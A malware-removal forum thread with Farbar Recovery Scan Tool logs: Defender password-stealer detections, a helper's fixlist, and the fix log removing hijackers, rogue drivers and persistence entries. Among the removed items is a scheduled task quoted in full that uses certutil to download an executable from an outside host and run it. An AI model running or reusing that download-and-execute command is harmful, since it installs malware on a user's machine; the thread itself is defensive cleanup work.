Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\Stanley\AppData\Local\Temp\~AceTemp\Invoice890667\log.exe
Action: Quarantine
Action Status:  To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. 
To finish removing malware and other potentially unwanted software, restart the computer. 
Error Code: 0x8007054f
Error description: An internal error occurred. 
Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0

Date: 2018-05-11 11:10:10.550
Description: 
Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0
Name: PWS:Win32/Dyzap.X
ID: 2147717189
Severity: Severe
Category: Password Stealer
Path: process:_pid:1280,ProcessStart:131703753193678578
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\Stanley\AppData\Local\Temp\Rar$EXa0.300\RTY_RFQ_GT_USD-FOQ_MoQ.exe
Action: Quarantine
Action Status:  To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. 
To finish removing malware and other potentially unwanted software, restart the computer. 
Error Code: 0x8007054f
Error description: An internal error occurred. 
Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0

Date: 2018-05-09 14:16:37.521
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.267.831.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14800.3
Error code: 0x80240016
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. 

Date: 2018-05-09 14:16:37.521
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.267.831.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14800.3
Error code: 0x80240016
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. 

CodeIntegrity:
===================================

Date: 2018-12-23 07:19:51.102
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:49.365
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:47.582
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:45.686
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i5-2540M CPU @ 2.60GHz
Percentage of memory in use: 67%
Total physical RAM: 4006.35 MB
Available physical RAM: 1296.44 MB
Total Virtual: 8102.35 MB
Available Virtual: 5425.77 MB

==================== Drives ================================

Drive 😄 () (Fixed) (Total:297.75 GB) (Free:64.73 GB) NTFS

\\?\Volume{4756afb4-4eee-11e8-824f-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.09 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 2DDE751F)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Link to post
Share on other sites

Hello, Welcome to Malwarebytes.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

emove these programs in bold via the Control Panel > Programs > Programs and Features.
CloudNet (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
IncrediMail (HKLM-x32\...\{35505AE1-27E2-4206-B3BF-58771803B8D0}) (Version: 6.6.0.5344 - IncrediMail) Hidden
IncrediMail 2.5 (HKLM-x32\...\IncrediMail) (Version: 6.6.0.5344 - IncrediMail Ltd.)
<<<>>>

Please download the attached Fixlist.txt file to  the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the FRST.txt log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

PLease post the Fixlog.txt and let me know what problem persists with this computer.

fixlist.txt

Link to post
Share on other sites

ok thank you.

I just ran the fixlist. and I got this log below.

meanwhile I still can't open my chrome browser.

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 13.02.2019
Ran by #Strazzo.RoseGold## (14-02-2019 23:59:05) Run:1
Running from C:\Users\Stanley\Downloads\FRST
Loaded Profiles: #Strazzo.RoseGold## (Available Profiles: #Strazzo.RoseGold## & RoseGold & Administrator)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
() C:\Windows\windefender.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [WitheredHill] => C:\Windows\rss\csrss.exe [4521472 2019-02-08] () <==== ATTENTION
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [CloudNet] => C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-02-12] (EpicNet Inc.) <==== ATTENTION
HKU\S-1-5-18\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGt0L7glATSfZxkIT3ysIwavywkdGdDMHHXXnjO9tg0XD9yKBCtOvz1LL_ReIEmCN-xJHRo9pam60eouPPD3a3O4qGVi5Es4iIR24Y7nh9akfPai5Q1OuzbONZLJRZFaqq_kxQ9Z-DCo_GGN5rXIyO8FSvytDaIXTrMcfHrh750Q&q={searchTerms}
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGt0L7glATSfZxkIT3ysIwavywkdGdDMHHXXnjO9tg0XD9yKBCtOvz1LL_ReIEmCN-xJHRo9pam60eoicpfV_MriSUAQnsKvLWIZ4S1YS7CQyd2I9U6z0Wmnkj5s8T6U3A_ZCShl9ETmnnVUnHlDWcYqc1HesPtQHGIzTqr4X-kp
SearchScopes: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=331&clid=2100768&text={searchTerms}
SearchScopes: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=331&clid=2100768&text={searchTerms}
BHO: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File
BHO-x32: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File
FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.HP
FF NewTab: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.NT
CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-05-04]
CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07]
CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07]
CHR HKLM-x32\...\Chrome\Extension: [cncgohepihcekklokhbhiblhfcmipbdh] - hxxp://clients2.google.com/service/update2/crx
OPR StartupUrls: "hxxp://www.yandex.ru/?win=331&clid=2100767"
OPR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Roaming\Opera Software\Opera Stable\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
R2 WinDefender; C:\Windows\windefender.exe [0 ] (CreateFileW function failed -> ) <==== ATTENTION (zero byte File/Folder)
R1 2CCD359FD649; C:\Windows\2CCD359FD649.sys [621928 2019-02-08] (????????(??)???? -> VxDriver)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] (WDKTestCert Admin,131480495282941941 -> ) <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-02-12] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
S3 WinRing0_1_2_0; \??\C:\Users\Stanley\AppData\Local\Temp\7ZipSfx.000\bin\tools\openhardwaremonitor\OpenHardwareMonitor.sys [X] <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Stanley\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File
Task: {15570572-319C-48BD-AD3A-A7BCC7852BC7} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [File not signed] <==== ATTENTION
Task: {3BA5F14D-A722-4A2B-BB6D-E5E747D3F491} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: {567829EB-0803-46FA-8139-6EAAC8AC96FA} - System32\Tasks\{E2C35618-CCBE-4D12-A910-891C3DC29DF9} => C:\Windows\system32\pcalua.exe -a "C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {C3FE92DB-969F-447D-9F05-1E0093D0326E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://delaker.info/app/app.exe C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe/update!STRAZZOWEEZY\#Strazzo.Ros <==== ATTENTION
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\??????.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x0000002a hxxp://www.yandex.ru/?win=331&clid=2100779
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\??????.?????.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x00000038 hxxp://mail.yandex.ru/?win=331&clid=2100779&from=dist_tl
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "JKZDOH8VNLX91K7"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "4571129"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "Q92XOF6FK3X9RHU"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "6137198"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "1204047"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "1214425"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "9352489"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "9159382"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "E054W697C3ZT54X"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "19U1RNX4SXNVB7C"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "SWPR71H14U5B9RU"
FirewallRules: [{AD0BAEF4-48BF-498A-B8E3-0D1E6B43B2BE}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{57D02F10-F87D-4455-8142-3BD552673374}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{7B7AEBBA-530C-47FF-B21F-41D628410DFC}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{587A092A-9420-4320-9DDC-513DB0956BC2}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{3F8E71DB-3CB9-46B0-9EEC-7E5BBF163810}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{F323F12D-3EEC-4458-B055-FBAD54D42779}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{3F67B498-C298-4567-8384-9D4AE7900D1F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{39A83BDE-1430-4A5B-8585-D464B7D8D881}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{9965AD37-C5DF-45BB-A1C2-549EA064C54F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{B8A59D96-BE63-4FC8-A092-04A578AB2D75}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [TCP Query User{FCAB66D8-96FF-4F4B-A106-15A490C11107}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [UDP Query User{C180034F-D109-4AFE-8F36-F09BB28A0030}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [{F03F74C6-9B28-4C5E-807F-CFFCE0C2E487}] => (Block) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [{5BAFDC52-58EF-4B5B-A341-46B75F445987}] => (Block) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [{D5FA44F3-6E70-484A-B950-51C23F63C442}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe No File
FirewallRules: [{798BE548-E73F-4AF0-94AC-9E161FCF481B}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe No File
FirewallRules: [{B5F6D4BD-ADF9-4442-A0DC-0243CA6C4944}] => (Allow) C:\Program Files (x86)\Email Extractor 6\Program.exe No File
FirewallRules: [{6B7EAF84-2E3E-4E50-BA29-83BCA3A5D636}] => (Allow) C:\Program Files (x86)\Email Extractor 6\Program.exe No File
FirewallRules: [{53056AED-CF0C-4B77-BE51-E7320F566EF1}] => (Allow) tunmgr.exe No File
FirewallRules: [{99F55921-8B24-4D45-9447-4B1DC03D0F8F}] => (Allow) tunmgr.exe No File
FirewallRules: [{926B5B97-5586-42AD-A783-764467766E9E}] => (Allow) mDNSResponder.exe No File
FirewallRules: [{C1F252D6-9E31-4C1C-92CA-5144E45CBD5F}] => (Allow) mDNSResponder.exe No File
FirewallRules: [{3982D1B5-9BA8-4969-BF52-16243FA460F3}] => (Allow) C:\Program Files\Syncios\pdt_syncios.exe No File
FirewallRules: [{6F63DBCC-4ACC-457F-93AE-3F8F539D5481}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManager.exe No File
FirewallRules: [{38634E52-E26E-4827-B65C-6FD60DEEFCC1}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManager.exe No File
FirewallRules: [{B8B2B85F-89FA-41D1-84C9-AD725179C6CF}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManagerCoreServices.exe No File
FirewallRules: [{68A8AE5E-4C4A-41A3-9B22-62A04FA9BE31}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManagerCoreServices.exe No File
FirewallRules: [{221BFC9C-CC6F-4FE4-B04E-F71FA6660C03}] => (Allow) C:\Windows\rss\csrss.exe ()
FirewallRules: [{2443D1D6-CC7F-4A8D-8467-39EE257F12AF}] => (Allow) C:\Users\#Strazzo.RoseGold##\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe No File
C:\Program Files (x86)\IncrediMail
C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss
C:\Program Files (x86)\UCBrowser
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
C:\Windows\2CCD359FD649.sys
C:\Users\Stanley\AppData\Roaming\EpicNet Inc
C:\Windows\rss\csrss.exe
C:\Windows\windefender.exe
2019-02-12 06:47 - 2019-02-12 06:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\EpicNet Inc
2019-02-04 22:34 - 2019-02-05 01:46 - 000000000 ____D () C:\Users\RoseGold\AppData\Local\Temp\syncios.exe
2019-01-30 07:52 - 2019-01-30 07:52 - 000000000 ____D () C:\Users\RoseGold\AppData\Local\Temp\SynciosDeviceService.exe
2019-02-10 23:14 - 2019-02-10 23:14 - 000000000 ____D () C:\Users\Stanley\AppData\Local\Temp\syncios.exe
2019-02-10 23:14 - 2019-02-10 23:14 - 000000000 ____D () C:\Users\Stanley\AppData\Local\Temp\SynciosDeviceService.exe
Reboot:

*****************

Restore point was successfully created.
Processes closed successfully.
C:\Windows\windefender.exe => No running process found
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Windows\CurrentVersion\Run\\WitheredHill" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => not found
"HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLowDiskSpaceChecks" => removed successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully
HKLM\Software\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D5FEC983-01DB-414A-9456-AF95AC9ED7B5} => removed successfully
HKLM\Software\Classes\CLSID\{D5FEC983-01DB-414A-9456-AF95AC9ED7B5} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D5FEC983-01DB-414A-9456-AF95AC9ED7B5} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{D5FEC983-01DB-414A-9456-AF95AC9ED7B5} => not found
"Firefox homepage" => removed successfully
"Firefox newtab" => removed successfully
CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-05-04] => Error: No automatic fix found for this entry.
CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07] => Error: No automatic fix found for this entry.
CHR Extension: (??????) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07] => Error: No automatic fix found for this entry.
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\cncgohepihcekklokhbhiblhfcmipbdh => removed successfully
"OPR StartupUrls: "hxxp://www.yandex.ru/?win=331&clid=2100767"" => removed successfully
C:\Users\Stanley\AppData\Roaming\Opera Software\Opera Stable\Extensions\iaoamimahmkdnfhcooffilicogppjebo => moved successfully
WinDefender => service not found.
2CCD359FD649 => Unable to stop service.
HKLM\System\CurrentControlSet\Services\2CCD359FD649 => removed successfully
2CCD359FD649 => service removed successfully
HKLM\System\CurrentControlSet\Services\Winmon => removed successfully
Winmon => service removed successfully
HKLM\System\CurrentControlSet\Services\WinmonFS => removed successfully
WinmonFS => service removed successfully
HKLM\System\CurrentControlSet\Services\WinmonProcessMonitor => removed successfully
WinmonProcessMonitor => service removed successfully
HKLM\System\CurrentControlSet\Services\WinRing0_1_2_0 => removed successfully
WinRing0_1_2_0 => service removed successfully
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8} => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{15570572-319C-48BD-AD3A-A7BCC7852BC7}" => not found
"C:\Windows\System32\Tasks\csrss" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3BA5F14D-A722-4A2B-BB6D-E5E747D3F491}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3BA5F14D-A722-4A2B-BB6D-E5E747D3F491}" => removed successfully
C:\Windows\System32\Tasks\UCBrowserUpdater => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UCBrowserUpdater" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{567829EB-0803-46FA-8139-6EAAC8AC96FA}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{567829EB-0803-46FA-8139-6EAAC8AC96FA}" => removed successfully
C:\Windows\System32\Tasks\{E2C35618-CCBE-4D12-A910-891C3DC29DF9} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{E2C35618-CCBE-4D12-A910-891C3DC29DF9}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C3FE92DB-969F-447D-9F05-1E0093D0326E}" => not found
"C:\Windows\System32\Tasks\ScheduledUpdate" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => not found
C:\Windows\Tasks\UCBrowserUpdater.job => moved successfully
C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\??????.lnk => Could not remove or repair shortcut argument. The shortcut could be damaged.
C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\??????.?????.lnk => Could not remove or repair shortcut argument. The shortcut could be damaged.
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\JKZDOH8VNLX91K7" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\JKZDOH8VNLX91K7" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\4571129" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\4571129" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\Q92XOF6FK3X9RHU" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Q92XOF6FK3X9RHU" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\6137198" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\6137198" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\1204047" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\1204047" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\1214425" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\1214425" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\9352489" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\9352489" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\9159382" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\9159382" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\E054W697C3ZT54X" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\E054W697C3ZT54X" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\19U1RNX4SXNVB7C" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\19U1RNX4SXNVB7C" => not found
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\SWPR71H14U5B9RU" => removed successfully
"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\SWPR71H14U5B9RU" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{AD0BAEF4-48BF-498A-B8E3-0D1E6B43B2BE}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{57D02F10-F87D-4455-8142-3BD552673374}" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{7B7AEBBA-530C-47FF-B21F-41D628410DFC}" => not found
